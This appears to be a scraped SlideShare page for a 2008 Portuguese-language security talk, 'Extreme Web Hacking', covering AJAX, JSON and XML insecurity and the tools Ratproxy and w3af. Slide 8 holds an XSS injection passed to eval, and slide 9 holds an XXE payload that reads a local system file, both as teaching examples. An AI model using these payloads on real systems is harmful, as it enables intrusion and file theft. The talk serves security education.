Extreme Web Hacking - h2hc 2008

  • 967 views
Uploaded on

 

  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Be the first to comment
    Be the first to like this
No Downloads

Views

Total Views
967
On Slideshare
0
From Embeds
0
Number of Embeds
2

Actions

Shares
Downloads
0
Comments
0
Likes
0

Embeds 0

No embeds

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
    No notes for slide

Transcript

  • 1. Wagner Elias > Extreme Web Hacking http://wagnerelias.com São Paulo, 09/11/2008
  • 2. GET Info
  • 3. Web Security é Simples
  • 4. Não Estúpido
  • 5. Extreme Web Resources
  • 6. AJAX INSECURITY - 1
  • 7. AJAX INSECURITY - 2
  • 8. JSON INSECURITY var json = "['Wagner', 2008, ''];alert('XSS');//']" var myArray = eval(json);
  • 9. XML INSECURITY - 1 <?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM &quot;file://c:/boot.ini&quot;> ]> <foo>&xxe;</foo>
  • 10. XML INSECURITY - 2
  • 11. XML-RPC INSECURITY
  • 12. Extreme Web Hacking
  • 13. Análise passiva com Ratproxy
  • 14. Explorando Web Resouces com w3af
  • 15. Perguntas?
  • 16. Referências